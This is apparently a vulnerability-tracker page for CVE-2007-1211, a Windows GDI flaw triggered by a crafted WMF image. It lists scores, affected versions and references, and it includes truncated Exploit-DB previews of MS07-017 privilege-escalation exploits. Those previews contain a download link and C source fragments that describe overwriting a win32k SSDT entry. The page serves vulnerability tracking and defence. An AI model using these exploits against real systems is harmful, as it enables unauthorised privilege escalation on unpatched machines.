CVE-2007-1211
published 2007-04-04CVE-2007-1211: Unspecified kernel GDI functions in Microsoft Windows 2000 SP4; XP SP2; and Server 2003 Gold, SP1, and SP2 allows user-assisted remote attackers to cause a…
PriorityP336high7.1CVSS 2.0
AVNACMAuNCNINAC
EXPLOIT
EPSS
31.27%
98.1th percentile
Unspecified kernel GDI functions in Microsoft Windows 2000 SP4; XP SP2; and Server 2003 Gold, SP1, and SP2 allows user-assisted remote attackers to cause a denial of service (possibly persistent restart) via a crafted Windows Metafile (WMF) image that causes an invalid dereference of an offset in a kernel structure, a related issue to CVE-2005-4560.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft Windows - '.ani' GDI Remote Privilege Escalation (MS07-017)
exploitdb·2007-04-26
CVE-2007-1215 Microsoft Windows - '.ani' GDI Remote Privilege Escalation (MS07-017)
Microsoft Windows - '.ani' GDI Remote Privilege Escalation (MS07-017)
---
MS Windows (.ANI) GDI Remote Elevation of Privilege Exploit (MS07-017)
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3804.zip (04262007-gdi_remote_elevation_privilege_exploit_ms07_017_principal.zip)
# milw0rm.com [2007-04-26]
Exploit-DB
Microsoft Windows - GDI Privilege Escalation (MS07-017) (2)
exploitdb·2007-04-17
CVE-2007-1215 Microsoft Windows - GDI Privilege Escalation (MS07-017) (2)
Microsoft Windows - GDI Privilege Escalation (MS07-017) (2)
---
/*
GDI Local Elevation of Privilege Vulnerability Exploit (MS07-017)
Coded by Lionel d'Hauenens
http://www.labo-asso.com
Development:
Dev-C++ 4.9.9.2
Linked with /lib/libgdi32.a
References:
http://www.microsoft.com/technet/security/bulletin/MS07-017.mspx
http://research.eeye.com/html/alerts/zeroday/20061106.html
http://www.milw0rm.com/exploits/3688
http://ivanlef0u.free.fr/?p=41
March 16, 2007
*/
#include
#include
#include
typedef enum _SECTION_INFORMATION_CLASS
{
SectionBasicInformation,
SectionImageInformation
} SECTION_INFORMATION_CLASS;
typedef struct _SECTION_BASIC_INFORMATION {
ULONG Base;
ULONG Attributes;
LARGE_INTEGER Size;
} SECTION_BASIC_INFORMATION;
typedef struct _GDI_TABLE_ENTRY
{
PVOID pKernelInfo;
WOR
Exploit-DB
Microsoft Windows - GDI Privilege Escalation (MS07-017) (1)
exploitdb·2007-04-08
CVE-2007-1215 Microsoft Windows - GDI Privilege Escalation (MS07-017) (1)
Microsoft Windows - GDI Privilege Escalation (MS07-017) (1)
---
#define _WIN32_WINNT 0x0500
#include
#include
#include
#pragma comment (lib, "user32.lib")
#pragma comment (lib, "gdi32.lib")
#pragma comment (lib, "shlwapi.lib")
#pragma comment (lib, "ntdll.lib")
/*
Here is a sploit for the GDI MS07-017 Local Privilege Escalation, presented during the last blackhat conferences
by Joel Ericksson. Modify the GdiTable of the current process and by calling good API's changean entry of the
win32k's SSDT by 0x2.
before :
lkd> dps bf998300 L 2
bf998300 bf934921 win32k!NtGdiAbortDoc
bf998304 bf94648d win32k!NtGdiAbortPath
after :
lkd> dps bf998300 L 2
bf998300 00000002
bf998304 bf94648d win32k!NtGdiAbortPath
win32k.sys bDeleteBrush (called by DeleteObject)
mov esi, [edx] ;esi=pKernelInfo
cmp
No writeups or analysis indexed.
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=499http://www.securityfocus.com/archive/1/466186/100/200/threadedhttp://www.securityfocus.com/bid/23275http://www.securitytracker.com/id?1017843http://www.vupen.com/english/advisories/2007/1215https://docs.microsoft.com/en-us/security-updates/securitybulletins/2007/ms07-017https://exchange.xforce.ibmcloud.com/vulnerabilities/33258https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1571http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=499http://www.securityfocus.com/archive/1/466186/100/200/threadedhttp://www.securityfocus.com/bid/23275http://www.securitytracker.com/id?1017843http://www.vupen.com/english/advisories/2007/1215https://docs.microsoft.com/en-us/security-updates/securitybulletins/2007/ms07-017https://exchange.xforce.ibmcloud.com/vulnerabilities/33258https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1571
2007-04-04
Published